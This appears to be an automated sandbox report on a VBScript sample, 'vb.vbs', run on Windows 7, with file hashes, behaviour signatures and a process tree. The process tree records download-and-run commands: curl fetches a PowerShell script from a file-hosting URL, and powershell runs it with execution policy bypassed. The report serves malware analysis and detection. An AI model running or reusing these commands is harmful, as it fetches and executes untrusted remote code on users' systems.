Analysis
max time kernel: 40s
max time network: 29s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 16/01/2023, 07:46
Static task: static1
Behavioral task: behavioral1
Sample: vb.vbs
Resource: win7-20221111-en
4 signatures
150 seconds
General
Target: vb.vbs
Size: 1024KB
MD5: ea33785b5feaade952b2768dc1b74d6d
SHA1: 2611ef2ca512873963550e03e8da3761a3f827da
SHA256: 664e3869703282407878479b644155607546c786f69cac5718055005c34b8c82
SHA512: 63745e2ee17ab5cca44eb46c5e7faecc7d2e38831d87c61262d9f4fb8d55d3891d1d9f49443dc07825273c5ca973ab3f6e964b1dae2191fd0cd306cf8a7fae35
SSDEEP: 12:O+h3awpefnYj5H6NPnqkc+h3awpeZ9nF6NPnJ:O+9xYM5wqh+9xYZly
Score: 3/10
Malware Config
Signatures

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (1 IoCs)
pid   Process
1780  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
description               pid   Process
Token: SeDebugPrivilege   1780  powershell.exe

Suspicious use of WriteProcessMemory (15 IoCs)
description                        pid   Process       procid_target
PID 2004 wrote to memory of 1424   2004  WScript.exe   28
PID 2004 wrote to memory of 1424   2004  WScript.exe   28
PID 2004 wrote to memory of 1424   2004  WScript.exe   28
PID 1424 wrote to memory of 580    1424  cmd.exe       30
PID 1424 wrote to memory of 580    1424  cmd.exe       30
PID 1424 wrote to memory of 580    1424  cmd.exe       30
PID 2004 wrote to memory of 1876   2004  WScript.exe   31
PID 2004 wrote to memory of 1876   2004  WScript.exe   31
PID 2004 wrote to memory of 1876   2004  WScript.exe   31
PID 1876 wrote to memory of 1616   1876  cmd.exe       33
PID 1876 wrote to memory of 1616   1876  cmd.exe       33
PID 1876 wrote to memory of 1616   1876  cmd.exe       33
PID 1616 wrote to memory of 1780   1616  cmd.exe       34
PID 1616 wrote to memory of 1780   1616  cmd.exe       34
PID 1616 wrote to memory of 1780   1616  cmd.exe       34
Processes

1. C:\Windows\System32\WScript.exe
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vb.vbs"
   PID: 2004
   Signatures: Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
      PID: 1424
      Signatures: Suspicious use of WriteProcessMemory

      3. C:\Windows\system32\cmd.exe
         Command line: cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
         PID: 580

   2. C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
      PID: 1876
      Signatures: Suspicious use of WriteProcessMemory

      3. C:\Windows\system32\cmd.exe
         Command line: cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
         PID: 1616
         Signatures: Suspicious use of WriteProcessMemory

         4. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            PID: 1780
            Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken